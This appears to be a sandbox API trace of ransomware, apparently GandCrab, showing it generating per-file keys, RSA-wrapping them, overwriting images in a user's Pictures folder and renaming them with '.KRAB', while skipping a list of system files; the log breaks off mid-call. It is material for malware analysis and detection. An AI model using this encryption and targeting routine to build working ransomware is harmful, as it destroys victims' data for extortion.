[0097.674] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.674] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0097.674] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.675] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.675] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.675] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.675] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.675] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.675] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0097.675] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.676] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.676] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.676] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.676] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.676] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.676] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011898) returned 1 [0097.676] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.676] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.676] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.677] GetLastError () returned 0x0 [0097.677] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.677] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.677] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011458) returned 1 [0097.677] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.677] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.677] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.677] GetLastError () returned 0x0 [0097.677] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.677] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0097.677] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ge ot78ogut7pnv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.678] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.678] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.678] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x1702, lpOverlapped=0x0) returned 1 [0097.687] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffffe8fe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.687] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1702, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x1702, lpOverlapped=0x0) returned 1 [0097.687] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.687] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.691] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.691] CloseHandle (hObject=0x778) returned 1 [0097.692] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.692] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ge ot78ogut7pnv.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\ge OT78oguT7pNV.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ge ot78ogut7pnv.bmp.krab")) returned 1 [0097.692] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.693] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.693] lstrcmpW (lpString1="iAZYffNjMNZyS.bmp", lpString2=".") returned 1 [0097.693] lstrcmpW (lpString1="iAZYffNjMNZyS.bmp", lpString2="..") returned 1 [0097.693] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="iAZYffNjMNZyS.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp" [0097.693] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.693] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp.KRAB") returned 82 [0097.693] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp") returned 77 [0097.693] lstrlenW (lpString=".bmp") returned 4 [0097.693] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.693] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.693] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.694] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp") returned 77 [0097.694] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp") returned 77 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="desktop.ini") returned 1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="autorun.inf") returned 1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="ntuser.dat") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="iconcache.db") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="bootsect.bak") returned 1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="boot.ini") returned 1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="ntuser.dat.log") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="thumbs.db") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="ntldr") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="NTDETECT.COM") returned -1 [0097.694] lstrcmpiW (lpString1="iAZYffNjMNZyS.bmp", lpString2="Bootfont.bin") returned 1 [0097.694] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.694] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0097.694] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.695] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.695] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.695] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.695] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.695] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.695] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0097.695] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.696] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.696] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.696] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.696] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.696] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.696] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.696] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.696] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.696] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.697] GetLastError () returned 0x0 [0097.697] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.697] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.697] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011678) returned 1 [0097.697] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.697] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.697] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.697] GetLastError () returned 0x0 [0097.697] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.697] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.697] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\iazyffnjmnzys.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.698] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.698] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.698] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x171cb, lpOverlapped=0x0) returned 1 [0097.712] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffe8e35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.712] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x171cb, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x171cb, lpOverlapped=0x0) returned 1 [0097.712] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.712] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.716] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.716] CloseHandle (hObject=0x778) returned 1 [0097.717] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.717] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\iazyffnjmnzys.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\iAZYffNjMNZyS.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\iazyffnjmnzys.bmp.krab")) returned 1 [0097.718] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.718] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.718] lstrcmpW (lpString1="i_pi0.gif", lpString2=".") returned 1 [0097.718] lstrcmpW (lpString1="i_pi0.gif", lpString2="..") returned 1 [0097.718] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="i_pi0.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif" [0097.718] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.718] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif.KRAB") returned 74 [0097.718] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif") returned 69 [0097.718] lstrlenW (lpString=".gif") returned 4 [0097.718] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.719] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.719] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif") returned 69 [0097.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif") returned 69 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="desktop.ini") returned 1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="autorun.inf") returned 1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="ntuser.dat") returned -1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="iconcache.db") returned -1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="bootsect.bak") returned 1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="boot.ini") returned 1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="ntuser.dat.log") returned -1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="thumbs.db") returned -1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.719] lstrcmpiW (lpString1="i_pi0.gif", lpString2="ntldr") returned -1 [0097.720] lstrcmpiW (lpString1="i_pi0.gif", lpString2="NTDETECT.COM") returned -1 [0097.720] lstrcmpiW (lpString1="i_pi0.gif", lpString2="Bootfont.bin") returned 1 [0097.720] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.720] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011678) returned 1 [0097.720] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.721] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.721] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.721] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.721] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.721] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.721] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0097.722] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.722] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.722] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.722] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.722] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.722] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.723] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10114e0) returned 1 [0097.723] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.723] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.723] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.723] GetLastError () returned 0x0 [0097.723] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.723] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.723] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010f08) returned 1 [0097.724] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.724] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.724] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.724] GetLastError () returned 0x0 [0097.724] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.724] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0097.724] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\i_pi0.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.725] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.725] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.725] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xff73, lpOverlapped=0x0) returned 1 [0097.738] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffff008d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.738] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xff73, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xff73, lpOverlapped=0x0) returned 1 [0097.738] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.738] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.742] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.742] CloseHandle (hObject=0x778) returned 1 [0097.743] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.743] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\i_pi0.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\i_pi0.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\i_pi0.gif.krab")) returned 1 [0097.744] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.744] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.744] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0097.744] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0097.744] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\KRAB-DECRYPT.txt" [0097.744] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.744] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\KRAB-DECRYPT.txt.KRAB") returned 81 [0097.744] lstrlenW 